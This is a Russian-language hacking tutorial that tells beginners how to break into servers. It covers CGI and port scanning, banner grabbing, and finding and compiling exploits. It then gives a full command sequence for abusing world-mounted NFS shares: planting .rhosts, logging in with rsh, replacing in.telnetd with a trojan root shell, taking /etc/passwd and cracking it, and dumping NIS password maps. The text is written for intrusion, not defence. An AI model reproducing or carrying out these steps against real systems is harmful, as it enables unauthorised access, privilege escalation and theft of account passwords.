|
Последнее время я получаю много вопросов по
поводу того с чего же всё таки начинать взлом
сервера(сайта,странички и тд), мне просто надоело каждый раз
отвечать на этот вопрос и я решил написать по этому поводу
статью. Итак,приступим. Первое с чего стоит начать это
просканировать хост на стандартные CGi сценарии с помощью
специальнх сканеров которых слава богу сейчас предостаточно.Ну и
что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО)
на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный
нам хак-группой D@mnedr,его можно скачать с йх официального сайта
www.cc.f2s.com,еще правда есть сканер от груааы Void
(www.void.ru) -Но он немного уступает DCS по скорости
сканирования. Ок,дальше,сканнер нашел уязвимый скрипт и вы
спросите что же делать дальше???,а дальше вам надо найти то как
использовать этот эксплоит,я дам вам несколько ссылок где можжно
найти описание этих ошибок: qwerty.nanko.ru (наиболее полный но
на Английском) www.void.ru www.hack-crack.com или вы можете
просто зайти на один из следующих сайтов и просто ввести уязвимый
скрипт в строке поиска: www.packetstorm.securify.com
www.securityfocus.com www.rootshell.com Второе и пожалуй
главное-это сканирование портов,для сканирования можно
использовать любой сканнер портов(какой-на ваш выбор-их сейчас
везде полно), но опять же хотел бы обратить ваше внимание на
сканнер Nscan который можно скачать тут
www.nscan.hypermart.net,этот сканер обладает просто потрясающей
скоростью сканирования и довольно просто в управлении(правда на
сайте лежит Shareware версия которая будет работать только 30
дней) После того как сканер нашел открытые порты вам надо
приконнектиться к каждому и посмотреть какая версия программного
обеспечения установлена на нём,делаеться это с помощью клиента
TELNET который есть даже в Вынь95(98,2000),в коммандной строке
TELNET вы пишете telnet>open www.target.com и смотрите версию
софта например WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. после
того как вы посмотрели версию вы должны найти эксплоит под эту
версию,идете опятьже на www.securityfocus.com
www.packetstorm.securify.com www.technotronic.com и вводите в
строке поиска название программы и его версию После того как вы
скачали эксплоит его как правило надо скомпилировать - то есть
привисти к рабочему состоянию(как правило) так как большинство
серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд то
и компилировать его надо под этими системами Если у вас нет
установленного ЮНИКСА то вам в любом случае(если хотите чего
нибудь ломать нужен Юникс Шелл-то есть оболочка Юникс) Бесплатно
её можно получить на www.nether.net и тому подобных
серверах(введите на любом поисковике UNIX+SHELL+FREE) Когда шелл
получем и эксплоит скачен то можно приступать к
компилированию,обычно эксплоит(в большинстве случаев) это
программа на языке С для компиляции будем использовать компилятор
GCC итак в командной строке оболочки пишем gcc -o exploit
exploit.c и нижимаем Enter хочу так же заметить что программы в
Юникс подобный системах запускаються с "./"+имя
программы, в нашем случае эксплоит будет запускаться
>./exploit Третье-еще один довольно популярный взлом системы
это проверка на расшаренные папки,в Юникс то можно проверить с
помощью утилиты showmount итак из оболочки запускаем showmount
>showmount -e www.target.com и видим /user/ Everyone или
что-то другое но если есть Everyone то значит папка открыта на
монтирование для всех дальше пишем >mount -t nfs
target.remote.com:/user /mnt потом переходми в каталог cd
/mnt/home и устанавливаем .rhosts >echo www.target.com
user/.rhosts дальше делаем следующее: >cat /etc/passwd
user::257:20::/: -смотрим пользователя и создаем такогоже у
нас(если возможно) > su - user ! Становимся им $ rsh
target.remote.com /bin/csh -i Warning! No access to terminal, job
control disabled! ! И заходим на удаленную машину % id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg
/usr/etc ! Каталог доступен на запись drwxrwxr-x 10 bin bin 1536
Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream
nowait root /usr/etc/in.telnetd in.telnetd ! Нашли программу,
которая запустится !под root"ом из нашего каталога % cd
/usr/etc % mv in.telnetd in.telnetd1 ! создаем троянского коня %
cat in.telnetd >!/bin/sh exec /bin/csh -i % chmod 755
in.telnetd ! и запускаем его % telnet 127.1 Connecting 127.1.
Warning! No access to terminal, job control disabled! > chown
user /etc; ! Делаем /etc своим : command not found > exit; :
command not found Connection closed by foreign host. > cd /etc
после того как у нас есть файл с паролями вы берет расшифровщик
паролей Юникс -John The Ripper запускаете его и ждете пока
расшифруються пароли потом из шелла коннектитесь на 23 порт и
вводите логин с паролем и все вы в системе! И последнее на что я
бы хотел обратить внимание в этой статье это проверка NIS сервера
Из облочки запускаем >rpcinfo -p www.target.com | grep bind и
если видим что=то типа 120000 2 udp 2493 ypbind то пробуем сдлать
следующее >ypx -o target.passwd -g target.remote.com Берём
файл с паролями и запускаем подборщик. На этом все! Если увас
есть какие нибудь вопросы пишите webmaster@hackworld.ru FreeRID
aka lEX //TDTeam.(c)
ОГЛВЛЕНИЕ
| |
|
|
| |